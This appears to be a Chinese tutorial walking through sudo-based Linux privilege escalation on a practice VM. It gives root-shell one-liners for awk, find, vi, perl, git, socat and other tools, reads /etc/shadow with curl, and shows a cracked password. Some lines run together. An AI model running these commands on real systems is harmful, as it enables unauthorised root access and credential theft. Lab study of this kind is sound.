环境配置
这里使用靶场linusec
登录账号密码:
账号:bob 密码:secret这里是普通权限用户
这里假定kali拿到了普通用户权限
kali连接ssh靶机
ssh bob@[目标ip]密码
secretash也是一种shell,占用资源很少的,管理员可能开启
sudo ashawk是一个强大的文本分析工具
sudo awk 'BEGIN {system("/bin/sh")}'使用这个命令可以直接提权到root
bash提权bashsudo bash
csh同样是一种shell
sudo cshcurl 提权
sudo curl file:///etc/shadowdash 一些小型设备可能安装
sudo dashed 文本编辑器,一次只能编辑一行
sudo ed!/bin/shenv查询环境变量,可以查询环境变量的时候执行一下bin/sh文件
sodu env /bin/shexpect自动化交互套件,执行程序的时候可以交互
sudo expect -c 'spawn /bin/sh;interact'find 指定查找文件
sudo find . -exec /bin/sh \; -quitftpless /etc/passwd读取文件时执行文件sh
!/bin/shsudo man man man命令的详细解释 man命令是Linux下的帮助指令,执行两次出现问题后输入下面的代码读取使用bin/sh
! /bin/shsocat 也是一个多功能网络工具
sudo socat stdin exec:/bin/shssh命令
sudo ssh -o ProxyCommand=' :sh 0<&2 1>&2' xvisudo vi -c ':!/bin/sh' /dev/null
zsh也属于shell中的一种,有一些Linux中会使用
sudo zshpico用来编辑文本文件的
sudo pico^R^Xreset; sh 1>&0 2>&0
rvim 改进版的vi
使用rvim加上python3执行命令
sudo rvim -c ':python3 import os; os.execl("/bin/sh","sh","-c","reset; exec sh")'perl 环境
sudo perl -e 'exec "/bin/sh";'tclsh 脚本语言
sudo tclshexec /bin/sh <@stdin > @stdout 2>@stderr
git 提权 开源封闭的程序管理系统
sudo git -p help config! /bin/sh
scriptsudo script -q /dev/null
taskset 设置线程的命令,可以把命令绑定到特定的cpu运行
sudo taskset 1 /bin/sh -p密码破解
cat /etc/passwdinsecurity 密码P@ssw0rdsu insecurity切换到这个用户权限
关注公众号回复:
Linux提权靶场获得靶场,靶场直接打开选择用vm虚拟机打开
扫描二维码关注我们吧!
文章来源: http://mp.weixin.qq.com/s?__biz=MzU4MjYxNTYwNA==&mid=2247486258&idx=1&sn=d7a091b2214cbd38e0a6171db5d760f3&chksm=fdb4dc69cac3557fcb8f8071128a158e9114ba57d5803ddb7186efe80aa0f5e4dab44b4d3093#rd
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh